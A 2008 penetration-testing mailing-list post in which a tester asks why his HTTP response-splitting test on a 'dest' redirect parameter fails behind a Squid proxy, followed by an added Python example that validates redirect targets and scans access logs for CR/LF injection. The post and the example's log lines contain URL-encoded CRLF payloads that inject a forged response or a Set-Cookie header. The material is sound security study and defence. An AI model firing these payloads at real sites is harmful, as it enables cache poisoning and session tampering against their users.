Penetration Testing
mailing list archives
Is there an HTTP Response Splitting Flaw?
From: bin4ry () theknetgroup org
Date: 29 Apr 2008 06:46:18 -0000
Hi together,
I'm new to this community as well as to pen-testing. I've already done some jobs for smaller companies and
IT infrastructures.
Now I have to pen-test a website. I need to perform a black-box test and I've already found some XSS and some
SQL injection bugs which I've reported to the site admin.
Now I believe that there's an HTTP response splitting flaw as well.
I found this suspicious resource:
foo.bar/accept?dest=/xy/z
This looks like a redirect script, right? So this is what I get:
GET foo.bar/accept?dest=/xy/z HTTP/1.1
Host: foo.bar
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Pragma: no-cache
Proxy-Connection: keep-alive
HTTP/1.x 302 Moved Temporarily <<<<<< looks suspicious
Via: A_PROXY
Connection: close
Proxy-Connection: close
Date: Fri, 25 Apr 2008 12:09:42 GMT
Location: foo.bar/xy/z <<<<<<<
Content-Type: text/html; charset=utf-8
Server: Apache/2.0.59 (Unix) mod_ssl/2.0.59 OpenSSL/0.9.8d
Cache-Control: no-cache, private
X-Runtime: 0.39293
X-Powered-By: Servlet/2.4 JSP/2.0
X-Cache: MISS from prx-deka-02.f.ddk
----------------------------------------------------------
GET /xy/z HTTP/1.1 <<<<< that's it, right?
Host: foo.bar
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
If-None-Match: "e7346ba9885de32fe8d51358b8a409af"
HTTP/1.x 304 Not Modified <<<<< comes straight from a squid proxy
Via: A_PROXY
Date: Fri, 25 Apr 2008 12:09:42 GMT
Server: Apache/2.0.59 (Unix) mod_ssl/2.0.59 OpenSSL/0.9.8d
Etag: "e7346ba9885de32fe8d51358b8a409af"
Cache-Control: private, max-age=0, must-revalidate, private
X-Cache: MISS from A_PROXY
Till now everything looks like a response splitting flaw. That's why I pass this one to $dest:
/xy/z/4%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aPragma:%20no-cache%0d%0aLast-Modified:%20Tue,%2015%20Nov%202055%2012:45:26%20GMT%0d%0aContent-Length:%2036%0d%0a%3Chtml%3EHTTP%20Response%20Splitting%3C/html%3E
Which is:
/xy/z
HTTP/1.1 200 OK
Content-Type: text/html
Pragma: no-cache
Last-Modified: Tue, 15 Nov 2055 12:45:26 GMT
Content-Length: 36
<html>HTTP Response Splitting</html>
So, again our HTTP traffic, now with an injected HTTP header:
GET /accept?dest=/xy/z/4%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aPragma:%20no-cache%0d%0aLast-Modified:%20Tue,%2015%20Nov%202055%2012:45:26%20GMT%0d%0aContent-Length:%2036%0d%0a%3Chtml%3EHTTP%20Response%20Splitting%3C/html%3E HTTP/1.1
Host: foo.bar
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Pragma: no-cache
Proxy-Connection: keep-alive
HTTP/1.x 302 Moved Temporarily
Via: A_PROXY
Connection: close
Proxy-Connection: close
Date: Fri, 25 Apr 2008 12:07:47 GMT
Location: foo.bar/de/xy/z
Content-Type: text/html; charset=utf-8
Server: Apache/2.0.59 (Unix) mod_ssl/2.0.59 OpenSSL/0.9.8d
Cache-Control: no-cache, private
X-Powered-By: Servlet/2.4 JSP/2.0
X-Cache: MISS from A_PROXY
----------------------------------------------------------
GET /xy/z HTTP/1.1
Host: foo.bar
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
If-None-Match: "78ad90f3569fd7b31ad763f3f52e2c46"
HTTP/1.x 304 Not Modified
Via: 1.0 A_PROXY
Date: Fri, 25 Apr 2008 12:07:48 GMT
Server: Apache/2.0.59 (Unix) mod_ssl/2.0.59 OpenSSL/0.9.8d
Etag: "78ad90f3569fd7b31ad763f3f52e2c46"
Cache-Control: private, max-age=0, must-revalidate, private
X-Cache: MISS A_PROXY
As you can see, the injected header won't be matched to the HTTP request from the redirect script.
I tried several CRLF types: %0d%0a, %0a%0a and %0a, but as we can see this is a Linux box, therefore %0d%0a should work.
There's a Squid between me and foo.bar. The whitepaper from Sanctum says that Squid has a packet boundary approach and
messages are read as packets, and therefore injected headers may need to be padded.
Can someone help me out?
Thx
P.S.: And another question. Since I am not really familiar with response splitting, I'd like to ask you whether the
risk of response splitting is always present when a script utilizes user input to form a new address which is the
target of a redirection script, which manifests in an HTTP 302 header from the server?
Thanks and greetings to the community from Germany.
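The post above asks whether a redirect script that copies user input into a Location header is always at risk. The added example below is not part of the original post or of the site under test; it shows the defender-side checks that decide that question for a handler like `/accept?dest=...`. `safe_redirect_target()` is the validation a redirect script should apply before emitting the header: percent-decode, refuse any CR/LF or other control character (the precondition for splitting the response), and accept only a site-relative path. `find_crlf_injection_attempts()` is detection logic run over constructed access-log lines in Apache combined format, flagging requests whose query string decodes to a CR or LF. All function names, the policy and the log lines are assumptions constructed for this example.

```python
"""Added example: redirect-target validation and access-log detection for
CR/LF (response splitting) attempts. Not from the original post."""
import re
from urllib.parse import unquote, urlsplit


class UnsafeRedirect(ValueError):
    """Raised when a redirect target must not be copied into a Location header."""


def safe_redirect_target(dest: str) -> str:
    """Return `dest` if it is safe to place in a Location header, else raise.

    Assumed policy for this example:
    - decode percent-encoding once, then refuse CR, LF or any other control
      character, so an injected "%0d%0a" can never terminate the header block;
    - accept only a site-relative path such as "/xy/z"; a scheme, a host or a
      protocol-relative "//host" target is refused, which also rules out open
      redirects to other sites.
    """
    decoded = unquote(dest)
    if any(ord(c) < 0x20 or ord(c) == 0x7F for c in decoded):
        raise UnsafeRedirect("control character in redirect target")
    parts = urlsplit(decoded)
    if parts.scheme or parts.netloc or not decoded.startswith("/") or decoded.startswith("//"):
        raise UnsafeRedirect("redirect target must be a site-relative path")
    return decoded


def is_safe_redirect_target(dest: str) -> bool:
    """Boolean wrapper around safe_redirect_target() for callers and tests."""
    try:
        safe_redirect_target(dest)
        return True
    except UnsafeRedirect:
        return False


# Request line inside an Apache combined-format log entry: "METHOD target HTTP/x.y"
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def find_crlf_injection_attempts(log_lines):
    """Return (line_number, parameter, decoded_value) for every query parameter
    that contains CR or LF after percent-decoding.

    The value is decoded twice so that a double-encoded "%250d%250a" is also
    flagged; a legitimate literal "%0d" in a parameter would then show up as a
    false positive, which is acceptable for a detection rule.
    """
    hits = []
    for n, line in enumerate(log_lines, 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        query = urlsplit(m.group("target")).query
        for pair in query.split("&"):
            if not pair:
                continue
            name, _, value = pair.partition("=")
            decoded = unquote(unquote(value))
            if "\r" in decoded or "\n" in decoded:
                hits.append((n, name, decoded))
    return hits


# Constructed log lines: a benign redirect, the post's %0d%0a payload (truncated),
# and a bare-%0a variant injecting a Set-Cookie header.
LOG_LINES = [
    '10.0.0.5 - - [25/Apr/2008:12:09:42 +0000] "GET /accept?dest=/xy/z HTTP/1.1" 302 0',
    '10.0.0.5 - - [25/Apr/2008:12:07:47 +0000] "GET /accept?dest=/xy/z/4%0d%0a%0d%0aHTTP/1.1'
    '%20200%20OK%0d%0aContent-Type:%20text/html HTTP/1.1" 302 0',
    '10.0.0.9 - - [25/Apr/2008:12:10:01 +0000] "GET /accept?dest=%0aSet-Cookie:%20a=b HTTP/1.1" 302 0',
]

if __name__ == "__main__":
    print("/xy/z accepted:", is_safe_redirect_target("/xy/z"))
    print("payload accepted:", is_safe_redirect_target("/xy/z/4%0d%0a%0d%0aHTTP/1.1%20200%20OK"))
    for line_no, param, value in find_crlf_injection_attempts(LOG_LINES):
        print(f"line {line_no}: CR/LF in parameter {param!r}: {value!r}")
```

Whether the proxy in front of the server happens to reassemble the split response is a separate question from whether the application is vulnerable: the handler is at risk as soon as it writes an unvalidated, decoded `dest` into the Location header, and the first function is the check that removes that risk regardless of what sits between client and server. The second function is the kind of rule a server operator can run over existing logs to see whether such probes are arriving.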